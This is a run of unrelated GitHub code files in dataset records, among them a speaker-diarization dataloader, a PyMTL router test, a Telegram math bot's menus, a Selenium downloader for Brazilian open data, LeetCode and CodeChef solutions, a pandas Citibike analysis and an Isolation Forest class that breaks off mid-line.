np.ndarray):\n audio_tensor = torch.from_numpy(audio_tensor)\n\n encoded_speaker_id = encoder.transform([str(speaker_id)])[0]\n\n for start in range(0, max(1, len(audio_tensor) - max_length_samples + 1), hop_length_samples):\n end = start + max_length_samples\n segment = audio_tensor[start:end]\n # If the audio segment is shorter than max_duration, pad it\n if len(segment) < max_length_samples:\n segment = torch.nn.functional.pad(segment, (0, max_length_samples - len(segment)))\n audios.append(segment)\n speaker_ids.append(encoded_speaker_id) # Duplicate speaker_id for each segment\n\n # Convert audio list into tensor\n audios = [audio.float() for audio in audios]\n audios = torch.stack(audios)\n\n # Apply transform (MelSpectrogram or MFCC) to audio\n audios = transform(audios).transpose(1, 2)\n\n speaker_ids = torch.tensor(speaker_ids)\n return {\"audio_values\": audios, \"speaker_ids\": speaker_ids}\n\n dataloader = DataLoader(dataset, collate_fn=collate_fn, shuffle=True, batch_size=batch_size)\n\n return dataloader, encoder\n","repo_name":"shamoons/speaker-diarization","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"450340305","text":"import ForestedGraphComplex\nimport CHairyGraphComplex\nfrom sage.all import *\n\nfrom timeit import default_timer as timer\n\n# vs = ForestedGraphComplex.PreForestedGVS(12,7,1,0)\nfor m in range(12):\n vs = ForestedGraphComplex.ForestedGVS(12,7,m,0, True)\n # for pvs in vs.get_required_prevs():\n # pvs.build_basis()\n # vs.build_basis()\n print(m)\n print(vs.get_dimension())\n\n start = timer()\n print( sum(1 for G in vs.get_basis() if G.is_biconnected() ) )\n end = timer()\n print(end - start)\n\n start = timer()\n print( sum(1 for G in vs.get_basis() if len(list(G.bridges()))==0 ) )\n end = timer()\n print(end - start)\n\n # b2 = [G for G in b1 if G.is_biconnected() ]\n\n # b3 = [G for G in b1 if len(list(G.bridges()))==0 ]\n\n # print(len(b2), len(b3))","repo_name":"sibrun/GH","sub_path":"source/TestForested4.py","file_name":"TestForested4.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5968668094","text":"from django.urls import path\r\nfrom LoginApp.Login import LoginHandleClass,MailNotifyClass\r\n\r\n\r\nurlpatterns =[\r\n # request html page\r\n path('index',LoginHandleClass.index),\r\n path('signin',LoginHandleClass.signin),\r\n path('register',LoginHandleClass.register),\r\n\r\n # request handle function\r\n path('query',LoginHandleClass.db_query),\r\n path('save',LoginHandleClass.db_save),\r\n \r\n #send Email \r\n path('sendmail',MailNotifyClass.notify),\r\n]\r\n \r\n","repo_name":"liroding/DockerWeb-workflowdemo","sub_path":"workflowdemo/Apps/LoginApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19487090937","text":"'''\n==========================================================================\nReqRespRouter_test.py\n==========================================================================\nTest cases for the ReqRespRouter.\n\nAuthor : Yanghui Ou\n Date : Sep 19, 2023\n'''\nimport pytest\n\nfrom pymtl3 import *\nfrom pymtl3.stdlib.stream import StreamSinkFL, StreamSourceFL\nfrom pymtl3.stdlib.test_utils import config_model_with_cmdline_opts, run_sim\n\nfrom ...ifcs.msg_types import CfgType, mk_cfg_pkt_type\nfrom ...terminal.ConfigTerminal import ConfigTerminal\nfrom ..ReqRespRouter import ReqRespRouter\n\n\naddr_nbits = 16\nTestPkt = mk_cfg_pkt_type( type_nbits=2, addr_nbits=addr_nbits, data_nbits=32 )\nwr = CfgType.WRITE\nrd = CfgType.READ\n\n\ndef mk_req_resp_msgs( lst ):\n req_msgs = [ TestPkt( type_, addr, data ) for type_, addr, data in lst[0::2] ]\n resp_msgs = [ TestPkt( type_, addr, data ) for type_, addr, data in lst[1::2] ]\n return req_msgs, resp_msgs\n\n\nclass TestRoutingLogic( Component ):\n def construct( s, PacketType, IDType, num_outports ):\n # Local parameters\n assert num_outports >= 4\n\n # Interface\n s.i_id = InPort( IDType )\n s.i_pkt = InPort( PacketType )\n s.o_val = OutPort( mk_bits( num_outports ) )\n\n # Routing logic\n @update\n def up_routing_logic():\n if s.i_pkt.addr < 0x1000:\n s.o_val @= 0b1\n elif s.i_pkt.addr < 0x2000:\n s.o_val @= 0b10\n elif s.i_pkt.addr < 0x3000:\n s.o_val @= 0b100\n else:\n s.o_val @= 0b1000\n\n\ndef test_elaborate( ):\n dut = ReqRespRouter( TestPkt, mk_bits( addr_nbits ), TestRoutingLogic,\n num_terminals=4 )\n dut.apply( DefaultPassGroup() )\n dut.sim_reset()\n for _ in range(10): dut.sim_tick()\n\n\nclass TestHarness( Component ):\n def construct( s, PacketType, req_msgs, resp_msgs, num_terminals=4 ):\n s.src = StreamSourceFL( PacketType, req_msgs )\n s.sink = StreamSinkFL ( PacketType, resp_msgs, ordered=False )\n s.dut = ReqRespRouter( PacketType, mk_bits( addr_nbits ),\n TestRoutingLogic, num_terminals=num_terminals )\n s.cfg_terminals = [\n ConfigTerminal( PacketType, num_config_regs=1, num_status_regs=0 )\n for _ in range(num_terminals) ]\n\n s.src.ostream //= s.dut.minion_req\n s.sink.istream //= s.dut.minion_resp\n\n for i in range( num_terminals ):\n s.cfg_terminals[i].minion_req //= s.dut.master_req[i]\n s.cfg_terminals[i].minion_resp //= s.dut.master_resp[i]\n\n def done( s ):\n return s.src.done() and s.sink.done()\n\n def line_trace( s ):\n return s.dut.line_trace()\n\n@pytest.mark.parametrize( \"sink_delay\", [0, 20] )\ndef test_rd_wr_one_debug_unit( cmdline_opts, sink_delay ):\n req_resps = [\n (wr, 0x0000, 0xdeadbeef), (wr, 0x0000, 0),\n (rd, 0x0000, 0 ), (rd, 0x0000, 0xdeadbeef),\n ]\n req_msgs, resp_msgs = mk_req_resp_msgs( req_resps )\n th = TestHarness( TestPkt, req_msgs, resp_msgs )\n th.set_param( \"top.sink.construct\", initial_delay=sink_delay )\n config_model_with_cmdline_opts( th, cmdline_opts, duts=['dut'] )\n run_sim( th, cmdline_opts )\n assert th.cfg_terminals[0].o_config[0] == 0xdeadbeef\n\n@pytest.mark.parametrize( \"sink_delay\", [0, 20] )\ndef test_rd_wr_all_debug_unit( cmdline_opts, sink_delay ):\n req_resps = [\n # debug unit 0\n (wr, 0x0000, 0xdeadbeef), (wr, 0x0000, 0),\n (rd, 0x0000, 0 ), (rd, 0x0000, 0xdeadbeef),\n # debug unit 1\n (wr, 0x1000, 0xcafec001), (wr, 0x1000, 0),\n (rd, 0x1000, 0 ), (rd, 0x1000, 0xcafec001),\n # debug unit 2\n (wr, 0x2000, 0xbadbed00), (wr, 0x2000, 0),\n (rd, 0x2000, 0 ), (rd, 0x2000, 0xbadbed00),\n # debug unit 3\n (wr, 0x3000, 0xc01dbeef), (wr, 0x3000, 0),\n (rd, 0x3000, 0 ), (rd, 0x3000, 0xc01dbeef),\n ]\n req_msgs, resp_msgs = mk_req_resp_msgs( req_resps )\n th = TestHarness( TestPkt, req_msgs, resp_msgs )\n th.set_param( \"top.sink.construct\", initial_delay=sink_delay )\n config_model_with_cmdline_opts( th, cmdline_opts, duts=['dut'] )\n run_sim( th, cmdline_opts )\n assert th.cfg_terminals[0].o_config[0] == 0xdeadbeef\n assert th.cfg_terminals[1].o_config[0] == 0xcafec001\n assert th.cfg_terminals[2].o_config[0] == 0xbadbed00\n assert th.cfg_terminals[3].o_config[0] == 0xc01dbeef\n","repo_name":"pymtl/pymtl3-cfg","sub_path":"pymtl3_cfg/router/test/ReqRespRouter_test.py","file_name":"ReqRespRouter_test.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42224299872","text":"from aiogram.utils.markdown import bold\nfrom telebot import types\nfrom telebot.types import InlineKeyboardButton\n\n\nfrom functions import *\n\nstart_menu = [types.KeyboardButton(\"📊 Таблицы\"), types.KeyboardButton(\"📕 Формулы и теоремы\"),\n types.KeyboardButton(\"📝 Решить задачу\"), types.KeyboardButton(\"⚖ Калькулятор\")]\ntable_menu = [\n (InlineKeyboardButton('Таблица степеней', callback_data='table of degrees'),),\n (InlineKeyboardButton('Таблица квадратов', callback_data='table of squares'),),\n (InlineKeyboardButton('Таблица кубов', callback_data='table of cubes'),),\n (InlineKeyboardButton('Таблица формул сокращенного умножения',\n callback_data='table of abbreviated multiplication formulas'),)\n]\ncallback_data_table = ['table of degrees', 'table of squares', 'table of cubes',\n 'table of abbreviated multiplication formulas']\nformulas_and_theorems_menu = [\n (InlineKeyboardButton('Квадрат', callback_data='square'), InlineKeyboardButton('Куб', callback_data='cube')),\n (InlineKeyboardButton('Ромб', callback_data='rhomb'), InlineKeyboardButton('Пирамида', callback_data='pyramid')),\n (InlineKeyboardButton('Треугольник', callback_data='triangle'),\n InlineKeyboardButton('Параллелограмм', callback_data='parallelogram')),\n (InlineKeyboardButton('Трапеция', callback_data='trapezoid'), InlineKeyboardButton('Конус', callback_data='cone')),\n (InlineKeyboardButton('Окружность', callback_data='circle'), InlineKeyboardButton('Сфера', callback_data='sphere')),\n (InlineKeyboardButton('Прямоугольник', callback_data='rectangle'),\n InlineKeyboardButton('Параллелепипед', callback_data='parallelepiped')),\n (InlineKeyboardButton('Основные тригонометрические тождества', callback_data='basic trigonometric identities'),)\n]\ncallback_data_formulas_and_theorems = ['square', 'cube', 'rhomb', 'pyramid', 'triangle', 'parallelogram', 'trapezoid',\n 'cone', 'circle', 'sphere', 'rectangle', 'parallelepiped', 'basic trigonometric '\n 'identities']\nsolve_the_task_menu = [\n (InlineKeyboardButton('Площадь квадрата', callback_data='square area'),\n InlineKeyboardButton('Площадь прямоугольника', callback_data='rectangle area')),\n (InlineKeyboardButton('Площадь пирамиды', callback_data='pyramid area'),\n InlineKeyboardButton('Площадь трапеции', callback_data='trapezoid area')),\n (InlineKeyboardButton('Площадь ромба', callback_data='rhomb area'),\n InlineKeyboardButton('Площадь круга', callback_data='circle area')),\n (InlineKeyboardButton('Площадь прямоугольного треугольника', callback_data='area of a right triangle'),),\n (InlineKeyboardButton('Площадь параллелограмма', callback_data='parallelogram area'),),\n (InlineKeyboardButton('Площадь конуса', callback_data='area of the cone'),\n InlineKeyboardButton('Площадь цилиндра', callback_data='cylinder area'))\n]\ncallback_data_solve_the_task = {'square area': ['Площадь квадрата. \\n\\nФормула: S = a^2, где\\na - сторона квадрата.'\n '\\n\\nОтправьте длину стороны квадрата. Для нецелых чисел используйте '\n 'точку.', square_area, False],\n 'rectangle area': ['Площадь прямоугольника.\\n\\nФормула: S = a*b, где\\na '\n '- длина прямоугольника\\nb - ширина прямоугольника\\n\\n'\n 'Отправьте длину и ширину прямоугольника через запятую. Для нецелых '\n 'чисел используйте точку.', rectangle_area, False],\n 'pyramid area': ['Площадь пирамиды. \\n\\nФормула: S = a^2+2a√b^2-a^2/4, где \\na - '\n 'сторона основания пирамиды\\nb - боковое ребро пирамиды\\n\\n'\n 'Отправьте сторону основания и боковое ребро через запятую. '\n 'Для нецелых чисел используйте точку.', pyramid_area, False],\n 'trapezoid area': ['Площадь трапеции.\\n\\nФормулы:\\nS = (a+b)/2*h\\n'\n 'S = (a+b)/2*√(c^2-(((a-b)^2+c^2-d^2)/2*(a-b))^2)\\n'\n 'a - верхнее основание\\nb - нижнее основание\\nc и d - боковые стороны'\n '\\nh - высота непосредственно подающая с верхнего основания на нижнее.'\n '\\n\\nВыберите формулу, по которой мы решим задачу.', '', [\n (InlineKeyboardButton('S = (a+b)/2*h',\n callback_data='trapezoid area_1'),\n InlineKeyboardButton(\n 'S = (a+b)/2*√(c^2-(((a-b)^2+c^2-d^2)/2*(a-b))^2)',\n callback_data='trapezoid area_2')),\n ]],\n 'rhomb area': ['Площадь ромба.\\n\\nФормулы:\\nS = 1/2*d1*d2\\nS = ah\\nd1 и d2 - диагонали '\n 'ромба\\nh - высота ромба\\na - сторона ромба.\\n\\n'\n 'Выберите формулу, по которой мы решим задачу.',\n '', [\n (InlineKeyboardButton('S = 1/2*d1*d2',\n callback_data='rhomb area_1'),\n InlineKeyboardButton(\n 'S = ah',\n callback_data='rhomb area_2')),\n ]\n ],\n 'circle area': ['Площадь круга.\\n\\nФормула: S = π*r^2\\nπ - 3,14\\nr - радиус круга\\n\\n'\n 'Отправьте радиус круга.', circle_area, False],\n 'area of a right triangle': ['Площадь прямоугольного треугольника.\\n\\n '\n 'Формула: S=(1/2)*a*b, где а и b катеты. \\n\\n'\n 'Отправьте длину катетов через запятую.'\n 'Для нецелых чисел используйте точку.',\n area_of_a_right_triangle, False],\n 'parallelogram area': ['Площадь параллелограмма. \\n\\n'\n 'Формула: S=a*h, где a сторона, а h высота проведенная '\n 'к этой стороне. \\n\\n'\n 'Отправьте сторону и высоту через запятую. Для нецелых чисел '\n 'используйте точку.', parallelogram_area, False],\n 'area of the cone': ['Площадь конуса.\\n\\n'\n 'Формула: S=π Rl + π R^2 \\n где R радиус,'\n 'l образующая конуса\\n\\n'\n 'Отправьте радиус и образующую конуса через запятую. '\n 'Для нецелых чисел используйте точку.', area_of_the_cone, False],\n 'cylinder area': ['Площадь цилиндра.\\n\\n'\n 'Формула: S=2πR(h+R) \\n где R радиус,'\n 'h высота цилиндра\\n\\n'\n 'Отправьте радиус и высоту цилиндра через запятую.'\n 'Для нецелых чисел используйте точку.', cylinder_area, False]}\ncallback_data_solve_the_task_inside = {\n \"trapezoid area_1\": [\n 'a - верхнее основание\\nb - нижнее основание\\nh - высота непосредственно подающая с верхнего основания на'\n ' нижнее.\\n\\nОтправьте верхнее, нижнее основание и высоту через запятую. Для нецелых '\n 'чисел используйте точку.', trapezoid_area_1],\n \"trapezoid area_2\": [\n 'a - верхнее основание\\nb - нижнее основание\\nc и d - боковые стороны.\\n\\n'\n 'Отправьте верхнее, нижнее основание и боковые стороны через запятую. Для нецелых'\n 'чисел используйте точку.', trapezoid_area_2],\n \"rhomb area_1\": [\n 'd1 и d2 - диагонали ромба.'\n '\\n\\nОтправьте диагонали ромба через запятую. Для нецелых '\n 'чисел используйте точку.', rhomb_area_1],\n \"rhomb area_2\": [\n 'h - высота ромба\\na - сторона ромба.\\n\\n'\n 'Отправьте высоту и сторону ромба через запятую. Для нецелых'\n 'чисел используйте точку.', rhomb_area_2]\n}\ncalculator_menu = [\n (InlineKeyboardButton('Возведение в степень', callback_data='exponentiation'),),\n (InlineKeyboardButton('Логарифм', callback_data='logarithm'),\n InlineKeyboardButton('Извлечение корня', callback_data='root extraction\"'),),\n (InlineKeyboardButton('Найти НОК', callback_data='nok'),\n InlineKeyboardButton('Найти НОД', callback_data='greatest common divisor'),),\n (InlineKeyboardButton('Факториал', callback_data='factorial'),\n InlineKeyboardButton('Проценты', callback_data='percent'),)\n]\n\ncallback_data_calculator = {\n \"exponentiation\": ['Отправьте число и степень, в которую вы хотите возвести число через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', exponentiation, False],\n \"logarithm\": ['Отправьте число, которое нужно в логарифм и основание логарифма через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', logarithm, False],\n \"root extraction\": ['Отправьте число, которое нужно в логарифм и основание логарифма через запятую(только не '\n 'перепутайте). Для нецелых чисел используйте точку.', root_extraction, False],\n \"greatest common divisor\": ['Отправьте два числа через запятую для вычисления НОД.', greatest_common_divisor,\n False],\n \"nok\": ['Отправьте два числа через запятую для вычисления НОК.', nok, False],\n \"factorial\": ['Отправьте число для вычисления его факториала.', factorial, False],\n \"percent\": ['Выберите подходящий вариант', '', [\n (InlineKeyboardButton('Сколько составляет % от числа', callback_data='percent_2'),\n InlineKeyboardButton('Сколько % составляет число x от числа y', callback_data='percent_1'),)\n ]]\n}\n\ncallback_data_calculator_inside = {\n \"percent_1\": ['Отправьте число x и число y через запятую, для нахождения процента числа x составляет от числа y.',\n percent_1],\n \"percent_2\": ['Отправьте число и процент через запятую, для нахождения процента от данного числа.',\n percent_2]\n}\n","repo_name":"Chera1/MathematicsHelper_Bot","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":14310,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5362296361","text":"\"\"\"\nGiven two strings s and t, return the number of distinct subsequences of s which equals t.\nA string's subsequence is a new string formed from the original string by deleting some (can be none) of the characters\nwithout disturbing the remaining characters' relative positions.\n(i.e., \"ACE\" is a subsequence of \"ABCDE\" while \"AEC\" is not).\n\nExample 1:\nInput: s = \"rabbbit\", t = \"rabbit\"\nOutput: 3\nExplanation:\nAs shown below, there are 3 ways you can generate \"rabbit\" from S.\nrabbbit\nrabbbit\nrabbbit\n\nExample 2:\nInput: s = \"babgbag\", t = \"bag\"\nOutput: 5\nExplanation:\nAs shown below, there are 5 ways you can generate \"bag\" from S.\nbabgbag\nbabgbag\nbabgbag\nbabgbag\nbabgbag\n\nConstraints:\n 1 <= s.length, t.length <= 1000\n s and t consist of English letters.\n\"\"\"\n\n\ndef numDistinct(s: str, t: str) -> int:\n \"\"\"\n Use Dynamic Programming\n dp[i][j] - the number of distinct subsequences of s[0:i] which equals t[0:j]\n * if s[i] != t[j], then dp[i][j] = dp[i-1][j]; meaning if last characters are not same, s has to still use the first\n i - 1 to match t's first j\n * if s[i] == t[j], then dp[i][j] = dp[i-1][j-1] + dp[i-1][j]\n #\n \"\"\"\n m = len(s)\n n = len(t)\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n for i in range(m + 1): # the \"\" is a subsequences of any string\n dp[i][0] = 1\n\n for j in range(1, n + 1):\n for i in range(j, m + 1): # s must be longer than t\n if s[i - 1] == t[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j]\n else:\n dp[i][j] = dp[i - 1][j]\n\n return dp[m][n]\n\n\n# test cases\nprint(numDistinct(\"rabbbit\", \"rabbit\")) # 3\nprint(numDistinct(\"babgbag\", \"bag\")) # 5\nprint(numDistinct(\"b\", \"b\")) # 1\n","repo_name":"jfzhang/LeetCode","sub_path":"0115. Distinct Subsequences.py","file_name":"0115. Distinct Subsequences.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21735492542","text":"import os\nimport sys\nfrom selenium import webdriver\n\n# Setup for Firefox options\nfirefoxOptions = webdriver.FirefoxOptions()\nfirefoxOptions.set_preference(\"browser.download.folderList\", 2)\nfirefoxOptions.set_preference(\"browser.download.dir\", \"/home/davilbs/Code/gov-data-analysis\")\nfirefoxOptions.set_preference(\"browser.download.useDownloadDir\", True)\n# Disable save prompt for csv and pdf mime types\nfirefoxOptions.set_preference(\"browser.helperApps.neverAsk.saveToDisk\", \"text/csv,application/pdf\")\n# Disable inner pdf reader\nfirefoxOptions.set_preference(\"pdfjs.disabled\", True)\n\ndriver = webdriver.Firefox(options=firefoxOptions)\n\nbaseURL = \"http://www.dados.gov.br/dataset/\"\nDATASETS = [\"importacoes-e-exportacoes-de-etanol\", \n \"importacoes-gas-natural\", \n \"b-importacoes-e-exportacoes-de-petroleo\",\n \"b-importacoes-e-exportacoes-de-derivados-de-petroleo\"]\n\n# Download by clicking on the links on each page\nfor dataset in DATASETS:\n driver.get(baseURL + dataset)\n\n linkList = driver.find_elements_by_class_name(\"resource-item\")\n for link in range(1, len(linkList)):\n driver.find_element_by_xpath(\"/html/body/div[3]/div/div[3]/div/article/div/section[2]/ul/li[{}]/div/a\".format(link)).click()\n driver.find_element_by_xpath(\"/html/body/div[3]/div/div[3]/div/article/div/section[2]/ul/li[{}]/div/ul/li[2]/a\".format(link)).click()\n\n# Create directories and moves tables and pdfs\n files = os.listdir()\n importDir = os.path.join(dataset, \"importacao\")\n exportDir = os.path.join(dataset, \"exportacao\")\n if not os.path.isdir(dataset):\n os.mkdir(dataset)\n if not os.path.isdir(importDir):\n os.mkdir(importDir)\n if not os.path.isdir(exportDir):\n os.mkdir(exportDir)\n for f in files:\n if \".csv\" in f:\n if \"importacao\" in f:\n os.rename(f, os.path.join(importDir, f))\n elif \"exportacao\" in f:\n os.rename(f, os.path.join(exportDir, f))\n else:\n os.rename(f, os.path.join(dataset, f))\n if \".pdf\" in f:\n os.rename(f, os.path.join(dataset, f))\n","repo_name":"davilbs/gov-data-analysis","sub_path":"getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21472663249","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.autograd import Variable as var\n\ndef get_data(x,w,b,d):\n c,r = x.shape\n y = (w * x * x + b*x + d)+ (0.1*(2*np.random.rand(c,r)-1))\n return(y)\n\nxs = np.arange(0,3,0.01).reshape(-1,1)\nys = get_data(xs,1,-2,3)\n\nxs = var(torch.Tensor(xs))\nys = var(torch.Tensor(ys))\n\nprint('xs.shape: ', xs.shape)\nprint('xs.type: ', xs.type)\nprint('xs: ', xs)\n\nx = torch.tensor([8., 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024])\ny = torch.tensor([8., 16, 24, 32, 48, 64, 96, 128, 192, 256, 384, 512, 768, 1024])\n# y = torch.tensor([26208396035170., 14125095233571, 9499624724564, 7332661699610, 4969123787708, 3922271353408, 2678558663290, \n# 2128286801327, 1447494492105, 1119992491206, 815502882802, 788519722917, 495173769367, 408134497783])\n\n\n# print('in_x.shape: ', in_x.shape)\n# print('in_x.reshape(-1, 1).shape: ', in_x.reshape(-1, 1).shape)\ny = y * 2\nx = x.reshape(-1, 1)\ny = y.reshape(-1, 1)\n\n\nplt.title(\"curve\")\nplt.plot(xs.data.numpy(),ys.data.numpy())\nplt.legend(\"ys\",\"ys_pre\")\nplt.show()\n\n\n\nclass Fit_model(torch.nn.Module):\n def __init__(self):\n super(Fit_model,self).__init__()\n self.linear1 = torch.nn.Linear(1,8)\n self.relu = torch.nn.ReLU()\n self.linear2 = torch.nn.Linear(8,1)\n\n self.criterion = torch.nn.MSELoss()\n self.opt = torch.optim.SGD(self.parameters(),lr=0.1)\n def forward(self, input):\n y = self.linear1(input)\n y = self.relu(y)\n y = self.linear2(y)\n return y\n\n\n\nmodel = Fit_model()\nfor e in range(80000):\n y_pre = model(x)\n\n loss = model.criterion(y_pre,y)\n if(e%10000==0):\n print(e,loss.data)\n \n # Zero gradients\n model.opt.zero_grad()\n # perform backward pass\n loss.backward()\n # update weights\n model.opt.step()\n\n\ny_pre = model(x)\nprint(x)\nprint(y)\nprint(y_pre)\n\nplt.title(\"curve\")\nplt.scatter(x.data.numpy(),y.data.numpy())\nplt.plot(x.data.numpy(),y_pre.data.numpy())\nplt.plot(x.data.numpy(),y_pre.data.numpy())\nplt.legend(\"ys\",\"ys_pre\")\nplt.show()\n","repo_name":"HPUedCSLearner/ecnu-tpf","sub_path":"pytorch/curve-fitting/curve_fit-1.py","file_name":"curve_fit-1.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28777336726","text":"# Maximal l*r value\n# If there is clash -> with max Ri\n# If again clash there smaller index\ndef chk(a,b,n):\n max_m = 0; ind = 0\n for i in range(n):\n m = a[i] * b[i]\n if m > max_m :\n max_m = m\n ind = i\n elif m == max_m:\n if b[i] > b[ind]:\n ind = i\n return ind + 1\n\ndef main():\n t = int(input())\n while(t>0):\n try:\n t-=1\n n = int(input())\n l = list(map(int,input().split()))\n r = list(map(int,input().split()))\n print(chk(l,r,n))\n except :\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Akashcba/coding","sub_path":"Phase 1/Day 4/MOVIEWKN.py","file_name":"MOVIEWKN.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10214948845","text":"import pandas as pd\nfrom pandas.tseries.offsets import Hour, Second\ndf = pd.read_csv('~/pythonw/project1/data/citibike-tripdata.csv', sep=',')\n\n\n\n#print(df['bikeid'].value_counts())\n\nrows_count = df.shape[0]\n\nsub_count = df[df['usertype']== 'Subscriber'].shape[0]\ncus_count = df[df['usertype']== 'Customer'].shape[0]\n#print(sub_count/rows_count)\n\nmen = df[df['gender']==1].shape[0]\nwomen = df[df['gender']==2].shape[0]\n#print(df['start station id'].nunique())\n#print(df['end station id'].nunique())\n\ndf['starttime'] = pd.to_datetime(df['starttime'])\ndf['stoptime'] = pd.to_datetime(df['stoptime'])\nage = df['birth year'].apply(lambda x: 2018 - x)\n#print(age.min())\n#print(df['end station name'].value_counts())\ndf = df.drop(['start station id', 'end station id'], axis=1)\ndf['age'] = age\ndf = df.drop('birth year', axis=1)\n\n\n#print(df[df['age']>60].shape[0])\n\ndf['trip duration'] = df['stoptime'] - df['starttime']\ndf['trip duration'] = df['trip duration'].dt.seconds\n\n\n#print(df['trip duration'].mean())\ndf['weekend'] = df['starttime'].apply(lambda x: 1 if x.dayofweek > 4 else 0)\n\n\nprint(df[df['weekend']==1].shape[0])\n\ndef time_of_day(date):\n if date.hour < 7:\n return 'night'\n elif date.hour < 13:\n return 'morning'\n elif date.hour < 19:\n return 'day'\n else:\n return 'evening'\n \ndf['time of day'] = df['starttime'].apply(time_of_day) \n\nprint(df.info())\nprint(df.head(5)) \n\nnight = df[df['time of day']=='night'].shape[0]\nday = df[df['time of day']== 'day'].shape[0]\nprint(day/night)","repo_name":"legiov/ml","sub_path":"project1/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"349508268","text":"# -*- coding: utf-8 -*-\n\"\"\"\n File Name: 322. Coin Change\n Description :\n Author : simon\n date: 19-3-28\n\"\"\"\n\n\nclass Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n coins = [x for x in coins if x <= amount]\n\n if not coins or not len(coins):\n if amount: return -1\n return 0\n\n dp = [amount + 1] * (amount + 1) # 使用0个硬币 实现[0,...,amount] 这么多种target sum\n dp[0] = 0 # 使用0个硬币实现target sum 0\n\n for tar in range(min(coins), amount + 1):\n for coin in coins:\n dp[tar] = min(dp[tar], dp[tar - coin] + 1)\n\n return -1 if dp[-1] == amount + 1 else dp[-1]\n\n\"\"\"\n修改版\ndp函数 输入:target 输出:需要的硬币数\n\"\"\"\n\n\nclass Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n dp = [amount + 1] * (amount + 1) #实现[0,...,amount] 这么多种target sum 需要的硬币数\n dp[0] = 0 # 实现target sum 0 需要0个硬币\n for tar in range(1, amount + 1):\n for coin in coins:\n if coin <= tar:\n dp[tar] = min(dp[tar], dp[tar - coin] + 1)\n return -1 if dp[-1] == amount + 1 else dp[-1]\n","repo_name":"Simon717/sword-to-offer-python","sub_path":"leetcode/322. Coin Change.py","file_name":"322. Coin Change.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"32785697737","text":"import json\nimport logging\nimport time\nimport torch\nimport numpy as np\n\nfrom torch.utils.data import DataLoader\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.metrics import roc_auc_score\nfrom base.base_dataset import BaseADDataset\nfrom networks.main import build_autoencoder\n\n\nclass IsoForest(object):\n \"\"\"A class for Isolation Forest models.\"\"\"\n\n def __init__(self, hybrid=False, n_estimators=100, max_samples='auto', contamination=0.1, n_jobs=-1, seed=None,\n **kwargs):\n \"\"\"Init Isolation Forest instance.\"\"\"\n self.n_estimators = n_estimators\n self.max_samples = max_samples\n self.contamination = contamination\n self.n_jobs = n_jobs\n self.seed = seed\n\n self.model = IsolationForest(n_estimators=n_estimators, max_samples=max_samples, contamination=contamination,\n n_jobs=n_jobs, random_state=seed, **kwargs)\n\n self.hybrid = hybrid\n self.ae_net = None # autoencoder network for the case of a hybrid model\n\n self.results = {\n 'train_time': None,\n 'test_time': None,\n 'test_auc': None,\n 'test_scores': None\n }\n\n def train(self, dataset: BaseADDataset, device: str = 'cpu', n_jobs_dataloader: int = 0):\n \"\"\"Trains the Isolation Forest model on the training data.\"\"\"\n logger = logging.getLogger()\n\n # do not drop last batch for non-SGD optimization shallow_ssad\n train_loader = DataLoader(dataset=dataset.train_set, batch_size=128, shuffle=True,\n num_workers=n_jobs_dataloader, drop_last=False)\n\n # Get data from loader\n X = ()\n for data in train_loader:\n inputs, _, _, _ = data\n inputs = inputs.to(device)\n if self.hybrid:\n inputs = self.ae_net.encoder(inputs) # in hybrid approach, take code representation of AE as features\n X_batch = inputs.view(inputs.size(0), -1) # X_batch.shape = (batch_size, n_channels * height * width)\n X += (X_batch.cpu().data.numpy(),)\n X = np.concatenate(X)\n\n # Training\n logger.info('Starting training...')\n start_time = time.time()\n self.model.fit(X)\n train_time = time.time() - start_time\n self.results['train_time'] = train_time\n\n logger.info('Training Time: {:.3f}s'.format(self.results['train_time']))\n logger.info('Finished training.')\n\n def test(self, dataset: BaseADDataset, device: str = 'cpu', n_jobs_dataloader: int = 0):\n \"\"\"Tests the Isolation Forest model on the test data.\"\"\"\n logger = logging.getLogger()\n\n _, test_loader = dataset.loaders(batch_size=128, num_workers=n_jobs_dataloader)\n\n # Get data from loader\n idx_label_score = []\n X = ()\n idxs = []\n labels = []\n for data in test_loader:\n inputs, label_batch, _, idx = data\n inputs, label_batch, idx = 